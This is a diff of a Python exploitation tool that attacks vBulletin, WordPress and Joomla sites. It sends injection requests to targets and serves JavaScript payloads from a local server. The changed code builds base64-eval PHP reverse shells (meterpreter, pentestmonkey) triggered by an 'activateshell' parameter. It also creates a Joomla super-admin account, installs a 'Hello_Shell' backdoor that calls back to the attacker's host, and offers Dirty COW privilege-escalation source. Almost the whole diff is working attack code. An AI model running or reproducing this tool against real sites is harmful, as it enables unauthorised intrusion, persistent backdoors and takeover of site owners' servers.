> " + FontColors.ENDC) + striptarget = re.compile('(http://|https://)') + newtarget = striptarget.sub('', target_link) + striptarget2 = re.compile('/.*') + finaltarget = striptarget2.sub('', newtarget) + # print finaltarget + # DEBUG: Should return e.g. mycompany.com.au + try: + server = HTTPServer((localhost, http_port), MyHandler) + print FontColors.BLUE + FontColors.BOLD + '\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' + print '\tâ•‘ Started Payload HTTP Server â•‘' + print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' + print FontColors.ENDC + print ' [*] Serving attack file from: http://{}:{}/{}.php '.format(localhost, http_port, evil_php) + print ' [*] Serving payload file from: http://{}:{}/{}.js '.format(localhost, http_port, evil_jsf) + print ' [!] Browse to: "' + FontColors.BLUE + FontColors.BOLD + 'misc.php?activateshell=true' + \ + FontColors.ENDC + '", to activate the payload.' + print ' [+] DCOW (SUID) 32-bit src is available at: http://{}:{}/dcow32.c'.format(localhost, http_port) + print ' [+] DCOW (SUID) 64-bit src is available at: http://{}:{}/dcow64.c'.format(localhost, http_port) + print ' [?] Press CTRL+C to stop the server and exit the script. \n' + print '-------------- HTTP Requests Below --------------' + server.serve_forever() + except KeyboardInterrupt: # Get all the unexpected keyboard interrupts + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + # server.socket.close() # I don't think there's anything to close if the server class fails. + exit_xsser(1) + except socket_error: + print " [!] A socket error occurred. Please check the listening IP address again." + exit_xsser(1) + except KeyboardInterrupt: # Get all the unexpected keyboard interrupts + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser(1) + elif exploit == 'BetterWPSecurity': + try: + global activation_file + if payload_selection == 'wp_hello_plugin': + activation_file = "/wp-content/plugins/hello.php" # Removed '?' for requests.get() + elif payload_selection == 'wp_footer_theme': + activation_file = "/" # Removed '?' for requests.get() + elif payload_selection == 'wpseo': + activation_file = "/robots.txt" # Removed '?' for requests.get() + else: + activation_file = "Unknown Payload - Restart Script" + exit_xsser() + + js_filename = "".join(random.sample(random_filename, 5))+".js" # 5 letters/numbers + unencoded_payload = '' + base64_payload = '">' + + fourohfour_url = "".join(random.sample(random_filename, 7)) + ".php" # Simpler and more random + # Removed trailing "?" as requests.get() handles that. + + try: + # TODO: Use python requests here instead. + # TODO: The previous code below is still there for testing purposes. + # TODO: You can remove the old code once the new code is 100% working. + # conn = httplib.HTTPConnection(target_hostname, 80) + # conn.request("GET", "/" + fourohfour_url + base64_payload) + # resp = conn.getresponse() + # output = resp.read() + + # Python 'requests' hack to send params unencoded. + url = "http://{}/{}".format(target_hostname, fourohfour_url) + s = requests.Session() + req = requests.Request(method='GET', url=url) + prep = req.prepare() + prep.url = url + base64_payload + r = s.send(prep) + # print resp.url # FUTURE DEBUG + output = r.text + + if r.status_code == 404: + print "\n [*] 404 received, checking that WordPress handled the error." + if re.search("(That page can)", output): + print " [*] It looks like WordPress handled the injection." + http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. + try: + server = HTTPServer((localhost, http_port), WordPressHandler) + print FontColors.BLUE + FontColors.BOLD + '\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' + print '\tâ•‘ Started Payload HTTP Server â•‘' + print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' + print FontColors.ENDC + print ' [*] Serving payload file from: http://{}:{}/{}'.format( + localhost, http_port, js_filename) + print ' [!] Browse to: "' + FontColors.BLUE + FontColors.BOLD + activation_file + \ + '?activateshell=true' + FontColors.ENDC + '", to activate the payload.' + print ' [+] DCOW (SUID) 32-bit src is available at: http://{}:{}/dcow32.c'.format( + localhost, http_port) + print ' [+] DCOW (SUID) 64-bit src is available at: http://{}:{}/dcow64.c'.format( + localhost, http_port) + print ' [?] Press CTRL+C to stop the server and exit the script. \n' + print '-------------- HTTP Requests Below --------------' + server.serve_forever() + except KeyboardInterrupt: + # server.socket.close() + exit_xsser() + else: + print " [!] The web server handled the 404 error page, meaning the injection did not " \ + "occur within Better WP Security." + except Exception as error: + print " [!] An error occurred: {}\n [!] Shutting down.".format(error) + traceback.print_exc() + # print "Localhost variable: {}".format(localhost) # DEBUG + exit_xsser(1) + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser(1) + elif exploit == 'SecurityCheck': + try: + if payload_selection == 'add_new_admin': + activation_file = "NOT_APPLICABLE" + elif payload_selection == 'install_backdoor': + activation_file = "NOT_APPLICABLE" + # "/index.php?option=com_helloshell&" + # TODO: Make it possible to use meterpreter or the reverse PHP shell in the future. + # TODO: Activation should be 100% automatic like the other payloads. + + else: + activation_file = "Unknown Payload - Restart Script" + exit_xsser() + js_filename = "".join(random.sample(random_filename, 5))+".js" # 5 letters/numbers + unencoded_payload = '' + # + # urlencoded_payload = urllib.quote_plus(unencoded_payload) # Remove if new code is working. + + # exploit_url = "index.php?option=" + exploit_url = "index.php" # New URL when using requests.get() + try: + + payload = {"option": unencoded_payload} + url = "http://{}/{}".format(target_hostname, exploit_url) + resp = requests.get(url, params=payload, timeout=3) + output = resp.text + + if resp.status_code == 400: + print "\n [*] 400 received, checking that Joomla SecurityCheck handled the error." + if re.search("(It has been detected a sequence that could mean a hacker attack)", output): + print " [*] It looks like Joomla SecurityCheck handled the injection." + http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. + try: + server = HTTPServer((localhost, http_port), WordPressHandler) + print FontColors.BLUE + FontColors.BOLD + '\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' + print '\tâ•‘ Started Payload HTTP Server â•‘' + print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' + print FontColors.ENDC + print ' [*] Serving payload file from: http://{}:{}/{} '.format( + localhost, http_port, js_filename) + # print ' [!] Browse to: "'+fontcolors.BLUE+fontcolors.BOLD+activation_file+' + # activateshell=true'+fontcolors.ENDC+'", to activate the payload.' + if joomla_username is not "NOT_APPLICABLE": + print ' [!] Your username is: ' + FontColors.BLUE + FontColors.BOLD + \ + joomla_username + FontColors.ENDC + ' ' + if joomla_password is not "NOT_APPLICABLE": + print ' [!] Your password is: ' + FontColors.BLUE + FontColors.BOLD + \ + joomla_password + FontColors.ENDC + ' ' + # TODO: Backdoor filename should be dynamic in the future. + print ' [!] Backdoor Link: http://{}:{}/Hello_Shell.zip'.format(localhost, http_port) + print ' [+] DCOW (SUID) 32-bit src is available at: http://{}:{}/dcow32.c'.format( + localhost, http_port) + print ' [+] DCOW (SUID) 64-bit src is available at: http://{}:{}/dcow64.c'.format( + localhost, http_port) + print ' [?] Press CTRL+C to stop the server and exit the script. \n' + print '-------------- HTTP Requests Below --------------' + server.serve_forever() + except KeyboardInterrupt: + # server.socket.close() + exit_xsser() + else: + print " [!] The web server handled the 400 error page, meaning the injection did not " \ + "occur within Joomla SecurityCheck." + except Exception as error: + print " [!] An error occurred: {}\n [!] Shutting down.".format(error) + traceback.print_exc() + # print "Localhost variable: {}".format(localhost) # DEBUG + exit_xsser(1) + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser(1) else: - activation_file = "Unknown Payload - Restart Script" - sys.exit() - unencoded_payload = '' # - urlencoded_payload = urllib.quote_plus(unencoded_payload) - exploit_url = "index.php?option=" - try: - conn = httplib.HTTPConnection(target_hostname, 80) - conn.request("GET", "/"+exploit_url+urlencoded_payload) - resp = conn.getresponse() - output = resp.read() - if resp.status == 400: - print "\n [*] 400 received, checking that Joomla SecurityCheck handled the error." - if re.search("(It has been detected a sequence that could mean a hacker attack)", output): - print " [*] It looks like Joomla SecurityCheck handled the injection." - http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. - try: - server = HTTPServer((localhost, http_port), WordPressHandler) - print fontcolors.BLUE+fontcolors.BOLD+'\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' - print '\tâ•‘ Started Payload HTTP Server â•‘' - print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' - print fontcolors.ENDC - print ' [*] Serving payload file from: http://%s:%s/x.js ' % (localhost,http_port) - #print ' [!] Browse to: "'+fontcolors.BLUE+fontcolors.BOLD+activation_file+'activateshell=true'+fontcolors.ENDC+'", to activate the payload.' - print ' [!] Your username is: '+fontcolors.BLUE+fontcolors.BOLD+joomla_username+fontcolors.ENDC+' ' - print ' [!] Your password is: '+fontcolors.BLUE+fontcolors.BOLD+joomla_password+fontcolors.ENDC+' ' - print ' [+] DCOW (SUID) 32-bit src is available at: http://%s:%s/dcow32.c' % (localhost,http_port) - print ' [+] DCOW (SUID) 64-bit src is available at: http://%s:%s/dcow64.c' % (localhost,http_port) - print ' [?] Press CTRL+C to stop the server and exit the script. \n' - print '-------------- HTTP Requests Below --------------' - server.serve_forever() - except KeyboardInterrupt: - server.socket.close() - sys.exit() - else: - print " [!] The web server handled the 400 error page, meaning the injection did not occur within Joomla SecurityCheck." - except Exception as e: - print " [!] An error occurred: %s\n[!] Shutting down." % e - sys.exit(1) - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit(1) - else: - print " [!] Invalid exploit, quitting." - sys.exit() + print " [!] Invalid exploit, quitting." + exit_xsser() + # Update JavaScript payload -def updateJavaScriptPayload(payload_type,php_input): - global target_hostname # Version 2.5 Messy Fix - target_hostname = '' - try: - if payload_type == 'vb_misc': - payload_file = open("Payloads/javascript/vbulletin_legacy.js") # Misc_Start vBulletin Hook (misc.php) - elif payload_type == 'wpseo': - payload_file = open("Payloads/javascript/wordpress_legacy.js") # WPSEO (robots.txt and .htaccess) - # Version 2.5 messy fix for callback in JS files for WordPress - Clean up later - print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" - target_hostname = raw_input(" [?] Hostname: ") - elif payload_type == 'wp_footer_theme': - payload_file = open("Payloads/javascript/wordpress_theme.js") # WordPress Core Theme (footer.php) - # Version 2.5 messy fix for TARGETWEBSITE in JS files - print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" - target_hostname = raw_input(" [?] Hostname: ") - elif payload_type == 'wp_hello_plugin': - payload_file = open("Payloads/javascript/wordpress_plugin.js") # WordPress Core Plugin (hello.php) - # Version 2.5 messy fix for TARGETWEBSITE in JS files - print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" - target_hostname = raw_input(" [?] Hostname: ") - # NEW JOOMLA EXPLOIT BELOW - elif payload_type == 'add_new_admin': - print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" - target_hostname = raw_input(" [?] Hostname: ") +def update_javascript_payload(payload_type, php_input): + global target_hostname # Version 2.5 Messy Fix + global http_port global joomla_username global joomla_password - payload_file = open("Payloads/javascript/joomla_admin.js") # Joomla Add New Super User (admin) - prompt1 = raw_input(" [?] Enter shown name: ") - prompt2 = raw_input(" [?] Enter a username: ") - prompt3 = raw_input(" [?] Enter a password: ") - prompt4 = raw_input(" [?] Enter an email : ") - joomla_username = prompt2 - joomla_password = prompt3 - prompt1_reg = re.compile('(VAR_SHOWN_NAME)') - prompt2_reg = re.compile('(VAR_USER_NAME)') - prompt3a_reg = re.compile('(VAR_PASSWORD_1)') - prompt3b_reg = re.compile('(VAR_PASSWORD_2)') - prompt4_reg = re.compile('(VAR_EMAIL)') - stage1 = prompt1_reg.sub(prompt1, payload_file.read()) - stage2 = prompt2_reg.sub(prompt2, stage1) - stage3a = prompt3a_reg.sub(prompt3, stage2) - stage3b = prompt3b_reg.sub(prompt3, stage3a) - stage4 = prompt4_reg.sub(prompt4, stage3b) - callbackhost_reg = re.compile('(CALLBACKHOST)') - callbackport_reg = re.compile('(CALLBACKPORT)') - stage5 = callbackhost_reg.sub(lhost, stage4) - stage6 = callbackport_reg.sub("80", stage5) - return stage6 # Need to return early for this exploit/payload - else: - print " [!] Invalid payload, quitting." - sys.exit() - http_port = "80" # Port to listen on. Does not really need to be dynamic at the moment. - payload_replace = re.compile('(PHP_PAYLOAD)') - payload_stage1 = payload_replace.sub(php_input, payload_file.read()) - hostname_replace = re.compile('(TARGETWEBSITE)') - payload_stage2 = hostname_replace.sub(target_hostname, payload_stage1) - callbackhost_replace = re.compile('(CALLBACKHOST)') - payload_stage3 = callbackhost_replace.sub(lhost, payload_stage2) - callbackport_replace = re.compile('(CALLBACKPORT)') - payload_stage4 = callbackport_replace.sub(http_port, payload_stage3) - return payload_stage4 - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit() - -# Based on the vbseo.py preparePayload function -# Optimise in a future version -def preparePayload(option): - try: - global lhost - global lport - if option == 'meterpreter': - preparePayloadBanner() - lhost = raw_input(" [?] Enter a listening IP: ") - lport = raw_input(" [?] Enter a listening port: ") - payload_shell = open('Shells/meterpreter/meterpreter.php') - find_host = re.compile('(LOCALHOST)') - add_host = find_host.sub(lhost,payload_shell.read()) - find_port = re.compile('(LOCALPORT)') - add_port = find_port.sub(lport,add_host) - stripspace = re.compile('[\t\n\r]') - filepart2 = stripspace.sub('', add_port) - payload_input_shell = "if($_GET['activateshell']=='true') { %s } " % filepart2 - payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input_shell)+"\"));" - return payload_insert - elif option == 'pentestmonkey': - preparePayloadBanner() - lhost = raw_input(" [?] Enter a listening IP: ") - lport = raw_input(" [?] Enter a listening port: ") - payload_shell = open('Shells/php-reverse-shell-1.0/php-reverse-shell.php') - find_host = re.compile('(LOCALHOST)') - add_host = find_host.sub(lhost,payload_shell.read()) - find_port = re.compile('(LOCALPORT)') - add_port = find_port.sub(lport,add_host) - stripcomments = re.compile('//.*?\n|/\*.*?\*/') - filepart1 = stripcomments.sub('', add_port) - stripspace = re.compile('[\t\n]') - filepart2 = stripspace.sub('', filepart1) - payload_input_shell = "if($_GET['activateshell']=='true') { %s } " % filepart2 - payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input_shell)+"\"));" - return payload_insert - elif option == 'pentestmonkey_notify': - preparePayloadBanner() - lhost = raw_input(" [?] Enter a listening IP: ") - lport = raw_input(" [?] Enter a listening port: ") - payload_shell = open('Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php') - find_host = re.compile('(LOCALHOST)') - add_host = find_host.sub(lhost,payload_shell.read()) - find_port = re.compile('(LOCALPORT)') - add_port = find_port.sub(lport,add_host) - stripcomments = re.compile('//.*?\n|/\*.*?\*/') - filepart1 = stripcomments.sub('', add_port) - stripspace = re.compile('[\t\n]') - filepart2 = stripspace.sub('', filepart1) - payload_input_shell = "if($_GET['activateshell']=='true') { %s } " % filepart2 - payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input_shell)+"\"));" - return payload_insert - elif option == 'payload_not_specified': - preparePayloadBanner() - payload_insert = " " - lport = 4321 - lhost = raw_input(" [?] Enter a listening IP: ") - return payload_insert - else: - print " [!] Invalid payload, quitting." - sys.exit() - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit() - + target_hostname = '' + payload_file = '' + try: + if payload_type == 'vb_misc': + payload_file = open("Payloads/javascript/vbulletin_legacy.js") # Misc_Start vBulletin Hook (misc.php) + elif payload_type == 'wpseo': + payload_file = open("Payloads/javascript/wordpress_legacy.js") # WPSEO (robots.txt and .htaccess) + # Version 2.5 messy fix for callback in JS files for WordPress - Clean up later + # TODO: Ask for the full URL with HTTP or HTTPS. + print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] Hostname: ").strip(" ") + elif payload_type == 'wp_footer_theme': + payload_file = open("Payloads/javascript/wordpress_theme.js") # WordPress Core Theme (footer.php) + # Version 2.5 messy fix for TARGETWEBSITE in JS files + print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] Hostname: ").strip(" ") + elif payload_type == 'wp_hello_plugin': + payload_file = open("Payloads/javascript/wordpress_plugin.js") # WordPress Core Plugin (hello.php) + # Version 2.5 messy fix for TARGETWEBSITE in JS files + # TODO: Make this into a function like target_hostname = ask_for_target() + print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] Hostname: ").strip(" ") + elif payload_type == 'add_new_admin': + print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] Hostname: ").strip(" ") + # global joomla_username + # global joomla_password + payload_file = open("Payloads/javascript/joomla_admin.js") # Joomla - Add New Super User (admin) + prompt1 = raw_input(" [?] Enter shown name: ") + prompt2 = raw_input(" [?] Enter a username: ") + prompt3 = raw_input(" [?] Enter a password: ") + prompt4 = raw_input(" [?] Enter an email : ") + joomla_username = prompt2 + joomla_password = prompt3 + # TODO: Consider simplifying this + # https://stackoverflow.com/questions/6116978/how-to-replace-multiple-substrings-of-a-string + prompt1_reg = re.compile('(VAR_SHOWN_NAME)') + prompt2_reg = re.compile('(VAR_USER_NAME)') + prompt3a_reg = re.compile('(VAR_PASSWORD_1)') + prompt3b_reg = re.compile('(VAR_PASSWORD_2)') + prompt4_reg = re.compile('(VAR_EMAIL)') + stage1 = prompt1_reg.sub(prompt1, payload_file.read()) + stage2 = prompt2_reg.sub(prompt2, stage1) + stage3a = prompt3a_reg.sub(prompt3, stage2) + stage3b = prompt3b_reg.sub(prompt3, stage3a) + stage4 = prompt4_reg.sub(prompt4, stage3b) + callbackhost_reg = re.compile('(CALLBACKHOST)') + callbackport_reg = re.compile('(CALLBACKPORT)') + stage5 = callbackhost_reg.sub(lhost, stage4) + stage6 = callbackport_reg.sub("80", stage5) + # TODO: End of major future rewrite. + return stage6 # Need to return early for this exploit/payload + # NEW JOOMLA PAYLOAD + elif payload_type == 'install_backdoor': + print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] Hostname: ").strip(" ") + # global joomla_username + # global joomla_password + joomla_username = "NOT_APPLICABLE" + joomla_password = "NOT_APPLICABLE" + payload_file = open("Payloads/javascript/joomla_backdoor.js") + # TODO: The user should be allowed to select meterpreter for the Joomla backdoor, and + # TODO: in that case, also make the payload 100% automatic like the others. + # TODO: Consider adding new WordPress payloads that add new themes/plugins with + # TODO: automatic self-removal upon exit. + print " [*] Using semi-automatic Joomla backdoor. \n" \ + " [*] Example: /index.php?option=com_helloshell&c64=bHMgLWFs \n" \ + " [*] Example: /index.php?option=com_helloshell&c=ls" + attacker_url = "http://{}:{}/{}".format(lhost, "80", "Hello_Shell.zip") + # TODO: Listening port and filename should be dynamic in the future. + # print " DEBUG: Attacker URL: %s" % attacker_url + # TODO: Another important future rewrite + prompt0_reg = re.compile('(VAR_BACKDOOR_URL)') + stage1 = prompt0_reg.sub(attacker_url, payload_file.read()) + callbackhost_reg = re.compile('(CALLBACKHOST)') + callbackport_reg = re.compile('(CALLBACKPORT)') + stage2 = callbackhost_reg.sub(lhost, stage1) + stage3 = callbackport_reg.sub("80", stage2) + # End major rewrite. + return stage3 + else: + print " [!] Invalid payload, quitting." + exit_xsser() + http_port = "80" # Port to listen on. Does not really need to be dynamic at the moment. + # TODO: Future section rewrite + payload_replace = re.compile('(PHP_PAYLOAD)') + payload_stage1 = payload_replace.sub(php_input, payload_file.read()) + hostname_replace = re.compile('(TARGETWEBSITE)') + payload_stage2 = hostname_replace.sub(target_hostname, payload_stage1) + callbackhost_replace = re.compile('(CALLBACKHOST)') + payload_stage3 = callbackhost_replace.sub(lhost, payload_stage2) + callbackport_replace = re.compile('(CALLBACKPORT)') + payload_stage4 = callbackport_replace.sub(http_port, payload_stage3) + # End section rewrite. + return payload_stage4 + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser() + + +# Choose IP address to listen on and update PHP payload +# TODO: Optimize in a future version +def prepare_payload(option): + try: + global lhost + global lport + global_ip_address = get_local_ip() + if option == 'meterpreter': + prepare_payload_banner() + use_local_ip = raw_input(" [?] Would you like to use the following IP: {}? (y/n) " + .format(get_colored_ip(global_ip_address))) + if use_local_ip == "y": + lhost = global_ip_address + if use_local_ip == "n": + lhost = raw_input(" [?] Enter a listening IP: ") + lport = raw_input(" [?] Enter a listening port: ") + payload_shell = open('Shells/meterpreter/meterpreter.php') + find_host = re.compile('(LOCALHOST)') + add_host = find_host.sub(lhost, payload_shell.read()) + find_port = re.compile('(LOCALPORT)') + add_port = find_port.sub(lport, add_host) + stripspace = re.compile('[\t\n\r]') + filepart2 = stripspace.sub('', add_port) + payload_input_shell = "if($_GET['activateshell']=='true') {{ {} }} ".format(filepart2) + payload_insert = "eval(base64_decode(\"" + base64.b64encode(payload_input_shell) + "\"));" + return payload_insert + elif option == 'pentestmonkey': + prepare_payload_banner() + use_local_ip = raw_input(" [?] Would you like to use the following IP: {}? (y/n) " + .format(get_colored_ip(global_ip_address))) + if use_local_ip == "y": + lhost = global_ip_address + if use_local_ip == "n": + lhost = raw_input(" [?] Enter a listening IP: ") + lport = raw_input(" [?] Enter a listening port: ") + payload_shell = open('Shells/php-reverse-shell-1.0/php-reverse-shell.php') + find_host = re.compile('(LOCALHOST)') + add_host = find_host.sub(lhost, payload_shell.read()) + find_port = re.compile('(LOCALPORT)') + add_port = find_port.sub(lport, add_host) + stripcomments = re.compile('//.*?\n|/\*.*?\*/') + filepart1 = stripcomments.sub('', add_port) + stripspace = re.compile('[\t\n]') + filepart2 = stripspace.sub('', filepart1) + payload_input_shell = "if($_GET['activateshell']=='true') {{ {} }} ".format(filepart2) + payload_insert = "eval(base64_decode(\"" + base64.b64encode(payload_input_shell) + "\"));" + return payload_insert + elif option == 'pentestmonkey_notify': + prepare_payload_banner() + use_local_ip = raw_input(" [?] Would you like to use the following IP: {}? (y/n) " + .format(get_colored_ip(global_ip_address))) + if use_local_ip == "y": + lhost = global_ip_address + if use_local_ip == "n": + lhost = raw_input(" [?] Enter a listening IP: ") + lport = raw_input(" [?] Enter a listening port: ") + payload_shell = open('Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php') + find_host = re.compile('(LOCALHOST)') + add_host = find_host.sub(lhost, payload_shell.read()) + find_port = re.compile('(LOCALPORT)') + add_port = find_port.sub(lport, add_host) + stripcomments = re.compile('//.*?\n|/\*.*?\*/') + filepart1 = stripcomments.sub('', add_port) + stripspace = re.compile('[\t\n]') + filepart2 = stripspace.sub('', filepart1) + payload_input_shell = "if($_GET['activateshell']=='true') {{ {} }} ".format(filepart2) + payload_insert = "eval(base64_decode(\"" + base64.b64encode(payload_input_shell) + "\"));" + return payload_insert + elif option == 'payload_not_specified': + prepare_payload_banner() + payload_insert = " " + lport = 4321 + use_local_ip = raw_input(" [?] Would you like to use the following IP: {}? (y/n) " + .format(get_colored_ip(global_ip_address))) + if use_local_ip == "y": + lhost = global_ip_address + if use_local_ip == "n": + lhost = raw_input(" [?] Enter a listening IP: ") + return payload_insert + else: + print " [!] Invalid payload, quitting." + exit_xsser() + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser() # ====================== # # MENU DEFINITIONS # ====================== # - + # Menu definition menu_actions = { - 'main_menu': main_menu, - '1': menu1, - '2': menu2, - '3': menu3, - '9': back, - 'q': exit, + 'main_menu': main_menu, + '1': menu1, + '2': menu2, + '3': menu3, + '9': back, + 'q': exit_xsser, } vbulletin_menu = { - '1': vbmenu1, - '9': back, - 'q': exit, + '1': vbmenu1, + '9': back, + 'q': exit_xsser, } wordpress_menu = { - '1': wpmenu1, - '2': wpmenu2, - '3': wpmenu3, - '9': back, - 'q': exit, + '1': wpmenu1, + '2': wpmenu2, + '3': wpmenu3, + '9': back, + 'q': exit_xsser, } joomla_menu = { - '1': jmenu1, - '9': back, - 'q': exit, + '1': jmenu1, + '2': jmenu2, + '9': back, + 'q': exit_xsser, } payload_menu = { - '1': meterpreter, - '2': pentestmonkey, - '3': pentestmonkey_notify, - '5': payload_not_specified, - '9': back, - 'q': exit, + '1': meterpreter, + '2': pentestmonkey, + '3': pentestmonkey_notify, + '5': payload_not_specified, + '9': back, + 'q': exit_xsser, } # ====================== # @@ -811,5 +1126,9 @@ def preparePayload(option): # Main Program if __name__ == "__main__": - # Launch our main menu - main_menu() + # Generate the hello_shell.zip file + generate_helloshell() + # Make the js_alert.sh file executable + enable_js_alert() + # Launch the main menu + main_menu()